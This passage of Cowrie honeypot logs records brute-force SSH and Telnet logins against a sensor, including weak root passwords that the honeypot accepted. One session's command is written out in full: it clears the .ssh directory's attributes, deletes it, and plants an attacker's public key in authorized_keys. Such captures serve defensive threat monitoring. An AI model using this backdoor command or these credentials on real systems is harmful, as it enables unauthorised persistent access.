03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T06:52:10.693154Z","src_ip":"103.12.154.87","session":"ecb49582889c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42496,"dst_ip":"1.2.3.4","dst_port":23,"session":"f0b945a9b921","protocol":"telnet","message":"New connection: 212.227.235.229:42496 (1.2.3.4:23) [session: f0b945a9b921]","sensor":"my-vps","timestamp":"2025-08-26T06:52:11.192967Z"}
{"eventid":"cowrie.login.success","username":"root","password":"adminHW","message":"login attempt [root/adminHW] succeeded","sensor":"my-vps","timestamp":"2025-08-26T06:52:11.391907Z","src_ip":"212.227.235.229","session":"f0b945a9b921"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T06:52:11.413414Z","src_ip":"212.227.235.229","session":"f0b945a9b921"}
{"eventid":"cowrie.command.input","input":"1","message":"CMD: 1","sensor":"my-vps","timestamp":"2025-08-26T06:52:11.415230Z","src_ip":"212.227.235.229","session":"f0b945a9b921"}
{"eventid":"cowrie.command.failed","input":"1","message":"Command not found: 1","sensor":"my-vps","timestamp":"2025-08-26T06:52:11.416196Z","src_ip":"212.227.235.229","session":"f0b945a9b921"}
{"eventid":"cowrie.login.failed","username":"debian","password":"password","message":"login attempt [debian/password] failed","sensor":"my-vps","timestamp":"2025-08-26T06:52:12.325176Z","src_ip":"103.12.154.87","session":"ecb49582889c"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:52:13.555176Z","src_ip":"103.12.154.87","session":"ecb49582889c"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":54140,"dst_ip":"1.2.3.4","dst_port":22,"session":"849431cc5159","protocol":"ssh","message":"New connection: 217.72.205.35:54140 (1.2.3.4:22) [session: 849431cc5159]","sensor":"my-vps","timestamp":"2025-08-26T06:52:52.659159Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:52:52.660199Z","src_ip":"217.72.205.35","session":"849431cc5159"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46723,"dst_ip":"1.2.3.4","dst_port":23,"session":"99480a574b21","protocol":"telnet","message":"New connection: 212.227.125.160:46723 (1.2.3.4:23) [session: 99480a574b21]","sensor":"my-vps","timestamp":"2025-08-26T06:52:53.516616Z"}
{"eventid":"cowrie.session.closed","duration":12.722269773483276,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:53:06.238810Z","src_ip":"212.227.125.160","session":"99480a574b21"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":5374,"dst_ip":"1.2.3.4","dst_port":22,"session":"bb5e872fa48c","protocol":"ssh","message":"New connection: 212.227.235.229:5374 (1.2.3.4:22) [session: bb5e872fa48c]","sensor":"my-vps","timestamp":"2025-08-26T06:53:23.372555Z"}
{"eventid":"cowrie.client.version","version":"GET / HTTP/1.1","message":"Remote SSH version: GET / HTTP/1.1","sensor":"my-vps","timestamp":"2025-08-26T06:53:23.380546Z","src_ip":"212.227.235.229","session":"bb5e872fa48c"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:53:23.381417Z","src_ip":"212.227.235.229","session":"bb5e872fa48c"}
{"eventid":"cowrie.session.connect","src_ip":"103.12.154.87","src_port":40990,"dst_ip":"1.2.3.4","dst_port":22,"session":"8e7ce36ddcd0","protocol":"ssh","message":"New connection: 103.12.154.87:40990 (1.2.3.4:22) [session: 8e7ce36ddcd0]","sensor":"my-vps","timestamp":"2025-08-26T06:53:25.222459Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T06:53:25.234954Z","src_ip":"103.12.154.87","session":"8e7ce36ddcd0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T06:53:27.562871Z","src_ip":"103.12.154.87","session":"8e7ce36ddcd0"}
{"eventid":"cowrie.login.success","username":"root","password":"iamroot","message":"login attempt [root/iamroot] succeeded","sensor":"my-vps","timestamp":"2025-08-26T06:53:30.918872Z","src_ip":"103.12.154.87","session":"8e7ce36ddcd0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T06:53:31.406771Z","src_ip":"103.12.154.87","session":"8e7ce36ddcd0"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T06:53:31.407452Z","src_ip":"103.12.154.87","session":"8e7ce36ddcd0"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T06:53:31.408949Z","src_ip":"103.12.154.87","session":"8e7ce36ddcd0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:53:31.621095Z","src_ip":"103.12.154.87","session":"8e7ce36ddcd0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60878,"dst_ip":"1.2.3.4","dst_port":22,"session":"7387b53f09d1","protocol":"ssh","message":"New connection: 212.227.125.160:60878 (1.2.3.4:22) [session: 7387b53f09d1]","sensor":"my-vps","timestamp":"2025-08-26T06:53:31.759368Z"}
{"eventid":"cowrie.client.version","version":"GET / HTTP/1.1","message":"Remote SSH version: GET / HTTP/1.1","sensor":"my-vps","timestamp":"2025-08-26T06:53:31.760312Z","src_ip":"212.227.125.160","session":"7387b53f09d1"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:53:31.761017Z","src_ip":"212.227.125.160","session":"7387b53f09d1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T06:53:32.118737Z","src_ip":"103.12.154.87","session":"8e7ce36ddcd0"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T06:53:32.119417Z","src_ip":"103.12.154.87","session":"8e7ce36ddcd0"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T06:53:32.776179Z","src_ip":"103.12.154.87","session":"8e7ce36ddcd0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.7","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:53:32.777115Z","src_ip":"103.12.154.87","session":"8e7ce36ddcd0"}
{"eventid":"cowrie.session.connect","src_ip":"103.12.154.87","src_port":43848,"dst_ip":"1.2.3.4","dst_port":22,"session":"1bb131dcc033","protocol":"ssh","message":"New connection: 103.12.154.87:43848 (1.2.3.4:22) [session: 1bb131dcc033]","sensor":"my-vps","timestamp":"2025-08-26T06:53:33.033239Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T06:53:33.034243Z","src_ip":"103.12.154.87","session":"1bb131dcc033"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T06:53:33.290578Z","src_ip":"103.12.154.87","session":"1bb131dcc033"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T06:53:35.747602Z","src_ip":"103.12.154.87","session":"1bb131dcc033"}
{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:53:36.976655Z","src_ip":"103.12.154.87","session":"1bb131dcc033"}
{"eventid":"cowrie.session.connect","src_ip":"103.12.154.87","src_port":45392,"dst_ip":"1.2.3.4","dst_port":22,"session":"56238ecef8c6","protocol":"ssh","message":"New connection: 103.12.154.87:45392 (1.2.3.4:22) [session: 56238ecef8c6]","sensor":"my-vps","timestamp":"2025-08-26T06:53:37.185903Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T06:53:37.188781Z","src_ip":"103.12.154.87","session":"56238ecef8c6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T06:53:39.526158Z","src_ip":"103.12.154.87","session":"56238ecef8c6"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T06:53:40.357740Z","src_ip":"103.12.154.87","session":"56238ecef8c6"}
{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:53:40.572726Z","src_ip":"103.12.154.87","session":"56238ecef8c6"}
{"eventid":"cowrie.session.closed","duration":"15.4","message":"Connection lost after 15.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:53:40.573692Z","src_ip":"103.12.154.87","session":"8e7ce36ddcd0"}
{"eventid":"cowrie.session.connect","src_ip":"103.12.154.87","src_port":39052,"dst_ip":"1.2.3.4","dst_port":22,"session":"710a3722de4e","protocol":"ssh","message":"New connection: 103.12.154.87:39052 (1.2.3.4:22) [session: 710a3722de4e]","sensor":"my-vps","timestamp":"2025-08-26T06:54:42.499297Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T06:54:42.502228Z","src_ip":"103.12.154.87","session":"710a3722de4e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T06:54:42.725600Z","src_ip":"103.12.154.87","session":"710a3722de4e"}
{"eventid":"cowrie.login.failed","username":"rune","password":"rune","message":"login attempt [rune/rune] failed","sensor":"my-vps","timestamp":"2025-08-26T06:54:43.648043Z","src_ip":"103.12.154.87","session":"710a3722de4e"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:54:44.875294Z","src_ip":"103.12.154.87","session":"710a3722de4e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":4719,"dst_ip":"1.2.3.4","dst_port":23,"session":"71c41d591f37","protocol":"telnet","message":"New connection: 212.227.125.160:4719 (1.2.3.4:23) [session: 71c41d591f37]","sensor":"my-vps","timestamp":"2025-08-26T06:55:00.654868Z"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","size":524,"shasum":"4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:55:11.426829Z","src_ip":"212.227.235.229","session":"f0b945a9b921"}
{"eventid":"cowrie.session.closed","duration":180.2414903640747,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:55:11.434856Z","src_ip":"212.227.235.229","session":"f0b945a9b921"}
{"eventid":"cowrie.session.closed","duration":32.064733028411865,"message":"Connection lost after 32 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:55:32.719523Z","src_ip":"212.227.125.160","session":"71c41d591f37"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46802,"dst_ip":"1.2.3.4","dst_port":22,"session":"ac7b8a08cb82","protocol":"ssh","message":"New connection: 212.227.235.229:46802 (1.2.3.4:22) [session: ac7b8a08cb82]","sensor":"my-vps","timestamp":"2025-08-26T06:55:56.762368Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T06:55:57.536621Z","src_ip":"212.227.235.229","session":"ac7b8a08cb82"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T06:55:57.537727Z","src_ip":"212.227.235.229","session":"ac7b8a08cb82"}
{"eventid":"cowrie.login.success","username":"root","password":"qwqwqw@","message":"login attempt [root/qwqwqw@] succeeded","sensor":"my-vps","timestamp":"2025-08-26T06:56:02.387513Z","src_ip":"212.227.235.229","session":"ac7b8a08cb82"}
{"eventid":"cowrie.session.closed","duration":"6.5","message":"Connection lost after 6.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:56:03.263585Z","src_ip":"212.227.235.229","session":"ac7b8a08cb82"}
{"eventid":"cowrie.session.connect","src_ip":"103.12.154.87","src_port":37112,"dst_ip":"1.2.3.4","dst_port":22,"session":"a247c34e38e8","protocol":"ssh","message":"New connection: 103.12.154.87:37112 (1.2.3.4:22) [session: a247c34e38e8]","sensor":"my-vps","timestamp":"2025-08-26T06:56:04.058883Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T06:56:04.060163Z","src_ip":"103.12.154.87","session":"a247c34e38e8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T06:56:04.985683Z","src_ip":"103.12.154.87","session":"a247c34e38e8"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:56:07.824177Z","src_ip":"103.12.154.87","session":"a247c34e38e8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43568,"dst_ip":"1.2.3.4","dst_port":23,"session":"ab147515f0a0","protocol":"telnet","message":"New connection: 212.227.235.229:43568 (1.2.3.4:23) [session: ab147515f0a0]","sensor":"my-vps","timestamp":"2025-08-26T06:57:11.703382Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-26T06:57:11.889144Z","src_ip":"212.227.235.229","session":"ab147515f0a0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T06:57:11.915392Z","src_ip":"212.227.235.229","session":"ab147515f0a0"}
{"eventid":"cowrie.command.input","input":"1","message":"CMD: 1","sensor":"my-vps","timestamp":"2025-08-26T06:57:11.917045Z","src_ip":"212.227.235.229","session":"ab147515f0a0"}
{"eventid":"cowrie.command.failed","input":"1","message":"Command not found: 1","sensor":"my-vps","timestamp":"2025-08-26T06:57:11.917925Z","src_ip":"212.227.235.229","session":"ab147515f0a0"}
{"eventid":"cowrie.session.connect","src_ip":"103.12.154.87","src_port":35170,"dst_ip":"1.2.3.4","dst_port":22,"session":"2a87f13f60da","protocol":"ssh","message":"New connection: 103.12.154.87:35170 (1.2.3.4:22) [session: 2a87f13f60da]","sensor":"my-vps","timestamp":"2025-08-26T06:57:18.873447Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T06:57:18.876093Z","src_ip":"103.12.154.87","session":"2a87f13f60da"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25